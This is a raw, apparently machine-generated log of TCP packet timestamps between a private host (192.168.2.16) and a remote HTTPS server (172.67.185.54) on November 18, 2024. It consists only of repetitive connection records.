                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404896021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404918909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404952049 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.405458927 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.405483007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.405582905 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.405599117 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.406542063 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.406558990 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.406644106 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.406657934 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446366072 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446402073 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446569920 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446585894 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446815014 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446832895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446901083 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.446913958 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.447793007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.447815895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.447866917 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880110025 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880294085 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880306959 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880379915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880392075 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.880446911 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881824970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881843090 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881913900 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881926060 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.881978989 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882450104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882467031 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882539034 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882550955 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.882620096 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883186102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883198023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883275986 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883287907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.883346081 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921180010 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921194077 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921288013 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921302080 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921363115 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921814919 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921833038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921895981 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921909094 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921936035 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.921971083 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922589064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922602892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922678947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922691107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.922744036 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923305988 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923331976 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923392057 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923403978 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923429966 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.923459053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998542070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998557091 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998625994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998640060 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998673916 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998698950 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.998698950 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999063015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999082088 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999145031 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999166012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.999186993 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.000874996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.000886917 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.000962019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.000973940 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.001636982 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.001656055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.001724005 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.001737118 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.002094030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.002105951 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.002193928 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.002206087 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.039930105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.039957047 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040023088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040038109 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040676117 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040688038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040760994 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.040772915 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041218996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041237116 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041287899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041301012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.041327000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.042004108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.042016983 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.042088985 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.042100906 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.091670990 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117233038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117247105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117326021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117338896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117391109 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117748022 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117770910 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117830992 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117841005 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117866993 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.117886066 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358418941 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358447075 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396050930 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396070957 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396145105 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396157026 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396209002 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396666050 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396678925 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396749020 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396759987 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396815062 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397234917 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397249937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397319078 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397330046 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397381067 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397820950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397835970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397902012 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397912979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397973061 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398410082 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398422956 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398493052 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398504972 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398557901 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473454952 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473474979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473566055 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473602057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473666906 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473982096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473998070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474071980 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474085093 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474153996 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474461079 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474474907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474550962 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474562883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474634886 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476115942 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476130962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476192951 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476206064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476342916 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476512909 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476711035 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476726055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476795912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476809025 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476865053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477174997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477189064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477255106 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477266073 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477329969 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.514863968 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.514879942 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.514976978 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515002012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515068054 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515522957 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515538931 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515625954 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515636921 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515686035 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516017914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516041994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516093016 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516104937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516135931 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516156912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516419888 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516473055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516505003 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516515970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516541004 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.517000914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.517014027 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.517082930 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.517095089 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567147017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567167044 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567354918 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567356110 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567425013 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592668056 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592685938 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592780113 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592840910 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592874050 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592890024 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592947006 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592963934 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834450960 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834501028 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834511995 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834527016 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834568977 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834579945 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834604979 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834633112 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834693909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834707022 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834774971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834784985 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834816933 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834831953 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834831953 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834837914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834849119 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834872961 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834908962 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835299969 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835323095 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835357904 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835375071 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835398912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835417032 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871301889 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871330976 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871392965 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871411085 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871437073 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871485949 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871766090 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871782064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871843100 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871854067 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871880054 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871896982 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872478962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872504950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872544050 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872555017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872582912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872622967 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873166084 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873182058 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873241901 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873253107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873300076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876684904 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876702070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876760960 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876792908 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876832008 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923299074 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923333883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923403025 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923430920 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923463106 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923485041 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949064970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949095011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949192047 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949208021 CET44349717172.67.185.54192.168.2.16
